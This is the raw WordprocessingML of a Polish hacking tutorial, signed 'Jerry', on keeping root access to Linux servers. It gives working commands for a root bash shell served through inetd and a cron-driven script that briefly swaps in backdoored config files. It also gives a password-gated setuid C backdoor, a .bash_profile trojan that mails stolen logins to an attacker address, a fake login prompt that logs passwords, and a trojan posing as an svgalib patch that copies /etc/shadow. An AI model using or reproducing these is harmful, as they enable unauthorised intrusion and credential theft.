        <w:t>/etc/inetd.conf</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t;jerry@sunnet jerry&gt;# cat /etc/inetd.con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tp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -l -i -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elnet stream tcp</w:t>
        <w:tab/>
        <w:t>nowait root /usr/sbin/tcpd in.telnetd -h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>ssh stream tcp nowait root /usr/sbin/tcpd /usr/local/sbin/sshd -i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>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ierwsza kolumna to nazwa demona lub po prostu numer portu. Jeśli wpiszesz nazwe - zostanie ona przełożona na numerek na podstawie omowionego wyżej pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Na tym porcie demon będzie oczekiwał połączeń. Druga kolumna to rodzaj połączenia, z reguły stream (strumien). Pożniej znowu idzie protokół, my akurat interesujemy się tylko tcp. Następna kolumna dotyczy oczekiwania, z reguły jest to "nowait". Następnie podany jest użytkownik, z którego uprawnieniami zostanie odpalony demon. Najkorzystniej dla nas ustawic "root", ale np. httpd (demon www) chodzi jako "nobody". Pożniej z kolei znajduje się program, który obsłuży połączenie, czyli prawie zawsze tcpd (może się też znajdować w katalogu /usr/sbin/tcpd, zależy od systemu). Na końcu znajduje się program lub demon, który zostanie odpalony w momencie polaczenia na port i zajmie sie obsluga uzytkownik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k! Skoro już wiemy co siedzi w tych plikach to zabieramy się do stawiania najprostszego backdoora na port. Wystarczy, że wpiszesz oto takie dwie linijki w wierszu poleceń:</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t;jerry@sunnet jerry&gt;# echo vbox 3913/tcp&gt;&gt;/etc/service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t;jerry@sunnet jerry&gt;# echo vbox stream tcp nowait root /bin/bash bash -i&gt;&gt;/etc/inetd.con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o wpisie do plików należy zrestartować demona tak aby uaktualnił nowe ustawienia, a robimy to przez poleceni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killall -HUP inet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eraz wystarczy z normalnego konta zrobić coś takie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telnet nazwa.serwera.costam 3913</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Trying xxx.xxx.xxx.xxx...</w:t>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>&lt;---- tutaj adres IP serwer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onnected to nazwa.serwera.costa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scape character is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ash# whoam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oo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o i to wszystko. Mamy swój pierwszy backdoor na por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o dobrze. Ale takie backdoory są łatwe w wykryciu i jestem przekonany, że prędzej czy póżniej admin i tak dowie się o ni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eraz opiszę backdoora postawionego na cron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ron to czasowy demon, który uruchamia inne programy w żądanych odstępach czasu. Jeżeli nie wiesz jak używać crontaba, możesz więcej na ten temat przeczytać w instrukcji man - wpisz w wierszu takie poleceni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man crontab</w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;---- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">wyświetla informacje na </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>temat crontab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 wiersza poleceń wpisz:</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cat /var/spool/cron/crontabs/roo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0       0       *       *       1       /usr/bin/updatedb</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ierwsza kolumna oznacza minuty (0-59), druga godziny (0-23), trzecia dni miesiaca (1-31), kolejna - miesiace roku (1-12), pozniej dni tygodnia (0-6) i na koncu komenda do wykonani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kopiuj /etc/inetd.conf do np /usr/include/take.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t;jerry@sunnet jerry&gt;# cp /etc/inetd.conf /usr/include/take.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raz /etc/services do /usr/include/shell.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cp /etc/services /usr/include/shell.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Teraz do pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.h </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>dopisz gdzieś w środku taką linijkę:</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etbios-dgm     138/udp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>nbdg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etbios-ssn     139/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>nbss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map</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    143/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t># imap network mail protoco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eWS</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    144/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>news</w:t>
        <w:tab/>
        <w:t># Window Syste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800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>imap3</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    165/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t># Intermin Mail Acces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nmp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    161/ud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Mamy już mamy serwis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>imap3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> króry używa portu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>165</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czywiście nie wpisujcie tam czegoś takiego tylko postarajcie się sami coś wymyśleć (po analizie /etc/services i /etc/inetd.conf powinieneś mieć już jakiś pomysł co do port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Teraz wyedytuj plik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/usr/include/take.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> w którym musisz dopisać:</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These are standard service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tp</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> stream  tcp  nowait  root  /usr/sbin/tcpd in.ftpd -l -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elnet stream  tcp  nowait  root  /usr/sbin/tcpd in.telnet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800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>imap3  stream  tcp  nowait  root  /bin/sh</w:t>
        <w:tab/>
        <w:t>sh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gopher stream  tcp  nowait  root  /usr/sbin/tcpd g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Następnie musimy odpalić skrypcik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>shell.s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p /etc/inetd.conf /etc/inet.sa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p /etc/services /etc/serv.sa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p -f /usr/include/take.h /etc/inetd.con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p -f /usr/include/shell.h /etc/service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killall -HUP inet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leep 36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v -f /etc/inet.sav /etc/inetd.con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v -f /etc/serv.sav /etc/services</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killall -HUP inetd</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shell.s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Skrypt ten nazywamy np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i umieszczamy go w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usr/bin/mh/ jeszcze tylko dajemy mu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>chmod +x /usr/bin/mh/shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> aby był to plik wykonywaln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chmod +x /usr/bin/mh/shel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o ten skrypt zrobił??</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 xml:space="preserve">Najpierw skopiował orginalne pliki </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/inetd.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">oraz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/service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i zachował je jako </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/inet.sav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/serv.sav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, następnie zamienił</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 xml:space="preserve">wcześniej przez nas przygotowane pliki w miejsce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/inetd.conf</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i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Komenda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>killall -HUP inetd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> spowodowała, że zmian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w demonie inetd zostały zapisane, następnie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>sleep 360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> oznacza, że mam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5 minuty aby wejść do systemu, poznieważ po tym czasie wszystko wróc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o normy, co spowodują 3 ostatnie komendy. Teraz konfigurujemy cron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Musimy dodać do pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/var/spool/cron/root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> następującą linijkę:</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t;jerry@sunnet jerry&gt;# echo 0 0 * * * /usr/bin/mh/get &gt;&gt;/var/spool/cron/roo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śli to umieścimy to cron każdego dnia o godzinie 24.00 uruchom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lik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/usr/bin/mh/get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> z backdoore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o i wszystko gotowe, teraz tylko sprawdzić czy wszystko działa jak należ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telnet localhost 15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Trying 127.0.0.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onnected to localhos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scape character is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ash# whoam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oo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szystko pięknie ale czy nie lepiej będzie postawienie backdoora na swoje zdefiniowane hasło? Otóż każdy użytkownik atakowanego servera może zrobić skan portów (odpowiednim programem) i zobaczy, że jakiś nietypowy port jest używany. Potem standartdowa procedura i roo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niżej zamieszczam kod do zabezpieczenia backdoora hasłe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main()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pass[10];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">&lt;---- długość literowa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canf("%s", pass);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>zdefiniowanego hasła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strcmp("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>haslo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>", pass)) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">&lt;---- w polu haslo wpisać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etuid(0);setgid(0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>własne hasełk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ystem("/bin/bash -i");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it(1);</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 xml:space="preserve">Wklejamy źródełko do pliku o nazwie np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>door.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i kompilujemy g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gcc door.c -o door.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eraz możemy odpalić go na dwa sposob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przykład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nadajusz mu (jako r00t of coz) suida </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>chmod +s door.s</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chmod +s door.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 xml:space="preserve">w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>inetd.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wpisujesz prykladowo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>door stream tcp nowait nobody /tmp/door.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echo door stream tcp nowait nobody &gt;&gt;/etc/inetd.conf</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bedzie to mniej podejrzane, z punktu widzenia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>inetd.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, chociaz admin moze szukac programow suidow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rzykład 2)</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2) pozostawiasz go bez suida, a zamiast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">nobody </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">(w pliku inetd.conf) piszesz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>roo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echo door stream tcp nowait root &gt;&gt;/etc/inetd.conf</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Co to jest KOŃ TROJAŃSKI? &lt;&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KOŃ TROJAŃSKI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to zwyczajny program, który posiada ukryte funkcje. Robi on zazwyczaj cos innego niż zadania wykonania, zazwyczaj różnorodnego(chociaż nic konkretnego), jest przeznaczony do robienia tego co ma robić.</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Koń Trojański PASSWD &lt;&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Można powiedzieć, że jest to klasyczne rozwiazanie zdobywania czyjegoś  hasła. Otoż zwyklemu użytkownikowi można podesłać program zawierający poniższy kod trojana, który po uruchomieniu kopiuje sie do pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.bash_profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, po wejsciu nakazuje powtorne logowanie, wysyła do nas login &amp; pass i ...znik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g='$lg'; psw='$psw';</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v -f $HOME/.bash_profile $HOME/.bash_Xprofile &gt;&amp; /dev/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at &lt;&lt;EOF&gt; $HOME/.bash_profil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Login incorrect";sleep 1 ; clear ; cat /etc/issue ; ech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n " "$HOSTNAME "login: " ; read l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n " password:" ; stty -echo ; read psw</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tty echo ; echo "$lg : $psw" &gt; $HOME/.rav66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il twoj@lewy.adres &lt; $HOME/.rav666 &a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leep 1; (rm -rf '$HOME/.rav66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v -f '$HOME/.bash_Xprofile' '$HOME/.bash_profile')&gt;&amp;/dev/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at /etc/mot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OF</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niżej kolejny kod trojana. Jest to nic innego jak fake login. Można to gdzies zostawic tak, by nęciło uruchomieniem albo postawic na porcie 23. Oczywiście wypadłoby zmienić 3 i 4 linijkę. Można też zmienić wedle własnych upodoban 3 linie od końc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lea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Red Hat Linux realase 6.0 (Hedwi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Kernel 2.2.5-15 on an i58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n "login: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ead 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n "Password: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tty -ech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ead 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tty ech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USER $UID $HOME $l $p &gt;&gt; /tmp/.rtf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leep 1</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Lame Admin &lt;&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żeli w Waszej szkole, uczelni lub cafejce internetowej jest jakis Lame Admin można mu podrzucić skrypcik który odpali na serwerku to co trzeba. Dalszą intencję wciśnięcia tego programiku pozostawiam Wam samym. Standardowo można powiedzeć, że jest to łata na jakąś dziurę z biblioteki svgalib lub coś w tym stylu. Próbujc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gt; Pożyteczne gdy kumpel ma linuxa, prawie nic na nim nie umie a robi nam syf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c) 2000 Jerry / MSS-00670-668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Lame Admin rulez!</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void mai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mkdir tmp $HO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cp /etc/shadow /home/jerry/tmp/shadow ; chmod +rws /home/jerry/tmp/shadow");</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echo #Voice Box System\n&gt;&gt;/etc/service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echo vbox 3913/tcp&gt;&gt;/etc/service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echo #Voice Box System\n&gt;&gt;/etc/inetd.con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echo vbox stream tcp nowait root /bin/bash bash -i&gt;&gt;/etc/inetd.conf &a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clea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killall -HUP inet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echo svgalib: Cannot get I/O permissions.\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echo svgalib: Cannot get I/O permissions.\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echo svgalib: Cannot get I/O permissions.\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echo svgalib: Cannot get I/O permissions.\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o robi ten programi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Jeżeli uruchomi go root, to na początku tworzy katalog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/tmp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> w domowym katalogu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
